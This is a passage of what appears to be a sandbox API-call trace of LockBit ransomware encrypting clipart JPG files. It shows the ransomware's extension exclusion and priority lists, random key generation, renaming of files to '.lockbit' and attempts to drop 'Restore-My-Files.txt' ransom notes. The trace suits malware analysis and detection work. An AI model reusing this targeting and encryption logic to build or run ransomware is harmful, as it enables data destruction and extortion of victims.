(lpString1=".hta", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.224] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.224] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.224] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.224] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.224] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.224] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.224] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.224] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.224] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.224] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.225] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.225] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.225] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.225] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.225] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341653.JPG") returned 1 [0159.225] lstrcmpiW (lpString1="ntldr", lpString2="J0341653.JPG") returned 1 [0159.225] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341653.JPG") returned 1 [0159.225] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341653.JPG") returned -1 [0159.225] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341653.JPG") returned -1 [0159.225] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341653.JPG") returned 1 [0159.225] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341653.JPG") returned -1 [0159.225] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.225] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341653.JPG") returned=".JPG" [0159.225] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.225] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.225] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.225] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.225] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.225] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.226] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.226] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.226] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.226] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.226] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.226] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.226] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.226] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.226] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.226] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.226] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.226] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341653.JPG.lockbit") returned 72 [0159.227] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341653.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341653.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0159.228] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.228] malloc (_Size=0x40068) returned 0x3df0008 [0159.228] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=15863) returned 1 [0159.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0159.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0159.229] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0159.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341653.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341653.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.259] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.259] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.260] free (_Block=0x1fa2ed8) [0159.260] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341653.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.260] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.260] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.261] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3d7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341654.JPG", cAlternateFileName="")) returned 1 [0159.261] lstrcmpiW (lpString1=".", lpString2="J0341654.JPG") returned -1 [0159.261] lstrcmpiW (lpString1="..", lpString2="J0341654.JPG") returned -1 [0159.261] PathFindExtensionW (pszPath="J0341654.JPG") returned=".JPG" [0159.261] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.261] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.261] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.261] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.261] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.261] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.261] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.261] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.261] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.261] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.261] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.261] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.261] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.262] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.262] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.262] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.262] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.262] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.262] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.262] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.262] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.262] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.263] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.263] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.263] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.263] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.263] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.263] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.263] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.263] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.263] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.263] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.263] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.263] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.263] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.263] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.263] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341654.JPG") returned 1 [0159.263] lstrcmpiW (lpString1="ntldr", lpString2="J0341654.JPG") returned 1 [0159.263] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341654.JPG") returned 1 [0159.263] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341654.JPG") returned -1 [0159.263] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341654.JPG") returned -1 [0159.263] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341654.JPG") returned 1 [0159.264] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341654.JPG") returned -1 [0159.264] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.264] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341654.JPG") returned=".JPG" [0159.264] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.264] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.264] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.264] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.264] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.265] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.265] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341654.JPG.lockbit") returned 72 [0159.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341654.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341654.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0159.266] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.266] malloc (_Size=0x40068) returned 0x1ff1e60 [0159.267] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=15743) returned 1 [0159.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0159.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0159.268] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0159.274] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341654.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341654.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.274] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.274] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.275] free (_Block=0x1fa2ed8) [0159.275] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341654.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.275] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.275] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.276] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4ec6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341738.JPG", cAlternateFileName="")) returned 1 [0159.276] lstrcmpiW (lpString1=".", lpString2="J0341738.JPG") returned -1 [0159.276] lstrcmpiW (lpString1="..", lpString2="J0341738.JPG") returned -1 [0159.276] PathFindExtensionW (pszPath="J0341738.JPG") returned=".JPG" [0159.276] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.276] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.276] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.276] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.276] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.276] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.276] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.276] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.276] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.276] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.276] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.276] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.276] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.276] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.276] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.276] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.277] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.277] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.277] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.277] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.277] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.277] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.277] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.277] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.277] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.277] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.278] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.278] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.278] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.278] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.278] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.278] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.278] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.278] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.278] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.278] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341738.JPG") returned 1 [0159.278] lstrcmpiW (lpString1="ntldr", lpString2="J0341738.JPG") returned 1 [0159.278] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341738.JPG") returned 1 [0159.278] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341738.JPG") returned -1 [0159.278] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341738.JPG") returned -1 [0159.278] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341738.JPG") returned 1 [0159.278] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341738.JPG") returned -1 [0159.278] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.278] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341738.JPG") returned=".JPG" [0159.278] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.278] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.278] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.278] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.279] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.279] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.279] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.279] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.279] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.279] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.279] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.279] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.279] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.279] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.280] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.280] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.280] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.280] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341738.JPG.lockbit") returned 72 [0159.280] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341738.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341738.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0159.281] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.281] malloc (_Size=0x40068) returned 0x3e70008 [0159.281] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=20166) returned 1 [0159.281] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.282] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0159.282] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.282] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.282] BCryptGenRandom (in: 